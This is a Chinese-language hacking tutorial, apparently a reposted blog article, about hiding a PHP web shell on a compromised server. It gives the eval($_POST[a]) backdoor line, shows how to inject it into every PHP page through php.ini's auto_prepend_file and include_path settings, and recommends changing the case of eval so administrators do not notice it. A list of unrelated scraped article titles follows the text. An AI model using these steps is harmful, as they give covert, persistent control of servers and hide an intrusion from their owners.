最近在看完了一个程序的代码后又重新温习了PHP中文手册, 在看的过程中突然想到了一个隐藏后门的方法,拿来给大家分享下 嘿嘿:) 在入侵服务器后如何能将后门做到不被管理员大叔发现这是很重要的。因此就出现了各种隐藏的方法,对于php来说大多是插入<?eval ($ _POST[a]);? >或者include()函数隐藏然后修改文件时间等等。网上多的很我就不在这罗嗦了。

测试环境:Apache/2.0.49 (Win32) PHP/4.3.1+Winxp sp2

在我们取得一个服务器的最高权限后我们可以通过修改服务器的配置文件php.ini来达到我们隐藏后门的目的。修改系统目录下面的php.ini文件。在php.ini文件第395-397和第420-424一段

图1 图2

根据手册中关于auto_prepend_file和auto_append_file数据处理配置选项可以看出默认条件下是为空的null 而且是e文解释为Automatically add files before or after any PHP document.不用我翻译了吧。如果我们将eval()函数的后门配置到php.ini文件里那么网站上所有的PHP文件将都会被include我们的后门。嘿嘿 当然是不可见的只是在解析的时候才include,当然管理员大叔也是发现不了的。因为后门已经隐藏看都看不到。

经过测试发现我们需要修改的php.ini配置文件的2个地方。如图3 图4

第1步:

在图3中修改设置添加我们eval()函数的后门的文件名,后门文件的名字一定要特别不能用index.php或者 config.php等网站上可能用到的文件名。可以都添上也可以添一个。在此建议后门文件就用<?eVal ($_POST[a]);?> 最好将eval()函数大小写变化下。

第2步:

看是什么系统如果是win那么就修改423-424 在此一定要注意

默认的配置几乎和php自带的没有任何改动

include_path = “.;c:\php\includes” 前面的 “.”代表/目录 而”;”后面的目录代表Automatically add files所有include文件的目录 。因此我们要配置隐藏后门要修改为

include_path = “d:\php\sapi;.” 我们所要include的文件目录放在根目录的前边。不然的话apache会在根目录下搜索我们的后门(当然是没有了从而导致服务器解析php文件失败),作为配置文件当然要把include_path前面的”;”去掉才能生效。然后重起服务就可以了。下面看看我们隐藏的后门运行的情况 图5

真是杀人于无形啊 所有服务器网站下面的php文件都可以被我们当作后门哦 嘿嘿 ! 关于其他环境的测试 在iis5.0 6.0测试通过。根据我个人看法只要服务器支持php解析此法应该都可以测试成功。

后记:

关于利用php.ini配置文件来做后门当然也可以用来做点其他的东西,比如:include的文件中如果是一个网页木马的网站呢或者是我们可以写一个严格过滤恶意用户提交的非法字符等等。就看你怎么用了 好了就到这吧.

本文作者lis0 转自黑面小窝 由网络安全(www.91ri.org) 收集整理.

网站php.ini,利用php.ini的另类后门相关推荐

  1. 利用.user.ini构建php后门

    目录 一.PHP 和apache的关系 PHP与apache的连接方式 apche2-module CGI 模式 FastCGI 模式 PHP-FPM 二..user.ini 利用条件 利用.user ...

  2. VC操作INI文件 ,INI文件操作总结,如何操作INI文件,INI文件使用方法小结

    INI文件简介 在我们写程序时,总有一些配置信息需要保存下来,以便在下一次启动程序完成初始化,这实际上是一种类持久化.将一些信息写入INI文件(initialization file)中,可完成简单的 ...

  3. linux服务器odbc在哪看,在Linux上寻找odbc.ini和odbcinst.ini文件的良好文档

    我在Debian上使用FreeTDS将PHP驱动的网站连接到MS-sql Server 2005数据库. 我可以给配置文件的解释: /etc/odbc.ini 保存连接到数据库的处理程序(例如PHP) ...

  4. Windows2000和WindowsXP中system.ini与win.ini的详细介绍

    友情提示:system.ini与win.ini与注册表同等重要的地位,删除其中的某项你的系统就有可能崩溃!请在操作前一定要做好备份复制到另一个位置! 1.前言 Windows利用扩展名为.INI的文件 ...

  5. 安装mysql后在安装目录下只有my-default.ini没有my.ini文件 解决-The MySQL server is running with the --secure-file-priv

    WIN10 系统环境 安装mysql后在安装目录下只有my-default.ini没有my.ini文件 . mysql报错 ---------- The MySQL server is running ...

  6. mysql odbc.ini_关于unixodbc中odbc.ini和odbcinst.ini的介绍

    关于unixodbc中odbc.ini和odbcinst.ini的介绍 unixODBC without the GUI Or everything you wanted to know about ...

  7. 视频:网站建设-如何利用网络赚大钱2

    视频:网站建设-如何利用网络赚大钱2 转载于:https://www.cnblogs.com/xzty/articles/2520355.html

  8. Windows 64 位 mysql 5.7以上版本包解压中没有data目录和my-default.ini和my.ini文件以及服务无法启动的解决办法以及修改初始密码的方法

    Windows 64 位 mysql 5.7以上版本包解压中没有data目录和my-default.ini和my.ini文件以及服务无法启动的解决办法以及修改初始密码的方法 参考文章: (1)Wind ...

  9. 黑客利用WordPress 插件暗中建立后门网站

    东方联盟网络安全组织在上周发布的一份报告中透露,有人观察到威胁行为者利用一个合法但过时的 WordPress 插件暗中建立后门网站,作为正在进行的活动的一部分. 有问题的插件是 Eval PHP,由名 ...

最新文章

  1. 关于ajax访问本地json文件报错404的问题
  2. SOC(网络安全管理平台)
  3. Bumblebee微服务网关之访问日志处理
  4. c语言课程设计大作业模版,c语言课程设计报告模板下载
  5. 罗永浩吐槽卖小米、苹果被骂,卖华为也被骂,李楠:警惕键盘侠
  6. 京东让员工参观看守所;华为电视面世;苹果市值重回全球第一 | 极客头条
  7. ubuntu命令行下中文乱码的解决方案
  8. android httpClient 支持HTTPS的2种处理方式
  9. Python一行流:列举所有k-mer组合(最简单写法)
  10. PDA手持终端扫描条码开单打印一体 结合后台电脑系统 数据同步交互解决方案
  11. Java全栈开发---Java ERP系统开发:商业ERP(一)UML建模工具的使用
  12. 【密码学】费马小定理素性检测(C++代码实现)
  13. 4298. 【NOIP2015模拟11.2晚】我的天
  14. swust2020春季《形势与政策》mooc考试答案参考
  15. 性能测试的价值、全链路压测了解
  16. 当RxJava遇上Retrofit
  17. 急,在线等!!!!!
  18. 初步学习——认识基站、扇区、小区、BBU、RRU、天线、馈线
  19. LED灯珠的封装形式
  20. TOJ 4074 Running Laps -- 树状数组

热门文章

  1. 如果不大于指定整数n的3个素数之和仍为素数,则把这3个素数称为一个基于n的全素组。例如对于n=15,素数3,5,11之和3+5+11=17为素数,则3,5,11 称为一个基于15的全素组。定义所有基于
  2. 故障电弧探测器保护配电线路和用电设备减少火灾发生
  3. 黑鲨4pro和小米11哪个好
  4. 渣本安卓客户端Android秋招总结(重排了字号)
  5. 大连海洋大学计算机科学技术专业就业情况,大连海洋大学计算机专业以后就业什么方向?...
  6. 赚钱的冷门行业,这几个都可以去操作!
  7. java 获取文件时间_在java中怎么获取文件的最后修改日期
  8. 李开复“埋雷”,蚂蚁拆弹
  9. 技校学计算机工资,本人想去技校学习计算机,请问计算机好学吗,这个行业怎么样,学成之后工资如何...
  10. Mac安装AES加密模块pycrypto